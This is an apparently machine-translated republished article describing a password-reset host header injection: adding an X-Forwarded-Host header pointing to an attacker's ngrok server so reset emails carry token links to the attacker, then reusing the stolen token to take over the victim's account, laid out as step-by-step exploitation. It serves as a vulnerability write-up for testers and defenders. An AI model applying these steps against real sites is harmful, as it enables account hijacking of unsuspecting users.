Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to add X-Forwarded-Host to the password reset request package to achieve complete hijacking of the victim's account. Many people may not know much about it. In order to make you understand better, the editor has summarized the following for you. I hope you can get something from this article.

By using the function of "forgetting password" of the target website, the X-Forwarded-Host host information is added to the request for reset password, so as to deceive the target website into directing the link of reset password to its own server, so as to realize the complete hijacking of the victim's account.

Here, for confidentiality reasons, first assume that the target test site is redacted.com, in the process of testing, I focused on its "forget password" function. After six hours of toss, I found a very interesting loophole that could be used to hijack the full account of the target victim.

Discovery process

Required tools: BurpSuite, Ngrok Server. Ngrok services can map their local PC to the Server public network on the cloud, in order to turn the local PC into a terminal server for communicating with the external network, and indirectly turn the Server on the cloud into a transit agent between the public network and the private network PC.

1. Visit the forget password function of the target website, in which enter the user name information to request to get the reset password link: https://redacted.com/users/forgot_password dint notice: then the target website will send a reset password link to your registered mailbox.

2. In the above process, open the Web capture packet with BurpSuite. The request packet is as follows:

Let's add a X-Forwarded-Host: bing.com to try and see if the target site will include this reset password link in the bing.com

X-Forwarded-For (XFF) is a HTTP request header field used to identify the original IP address of a client connected to a Web server through a HTTP proxy or load balancer. The developers of Squid cache proxy server first introduced this HTTP header field, and it was formally proposed by IETF in the standardization draft of HTTP header field [1]. Refer to here for details.

3. Here, we open the mailbox to see what the password reset link sent from the target website looks like. Wow, from the email we sent, we can see that it contains the password reset link of the user's Token information, which looks like this:

Https://bing.com/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES

In this way, we can assume that my password reset Token information has been forwarded to bing.com, and here we need to do a real verification of this Token, so we can replace the https://bing.com in the password reset link with the https://redacted.com of the target website.

4. Sure enough, we have opened a page that can really reset the password!

Vulnerability exploitation

According to the above operations and existing problems, I can construct a network architecture to hijack user-related information. The steps are as follows:

1. Set up Attacker server through ngrok service

2. Open the Burpsuite grab package, enter the victim's user name information at the "forget password" of the target website, and perform the password reset operation.

3. In the password reset request package captured by Burpsuite, add an Attacker server, such as:

X-Forwarded-Host: ngrok.io

Where ngrok.io is the domain name address of the Attacker server. Such as:

4. Therefore, when the victim's mailbox receives the password reset link sent by the target website, it will contain the domain name address of the Attacker server, such as:

Http://ngrok.io/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES

When the victim accidentally clicks on the link, he will request the Attacker server ngrok.io with his user password reset Token (here interaction with the user is required)

5. When the victim clicks on the above link, on the Attacker server ngrok.io, the attacker will see a request information containing the victim user password reset Token, as follows:

6. After the attacker has obtained the password reset Token of the victim user, replace the Attacker server ngrok.io with the target website https://redacted.com, and add the subsequent victim user password reset Token, the attacker can successfully reset the password of the victim account and realize the complete hijacking of his account.

After reading the above, do you have any further understanding of how to add X-Forwarded-Host to the password reset request package to achieve complete hijacking of the victim's account? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.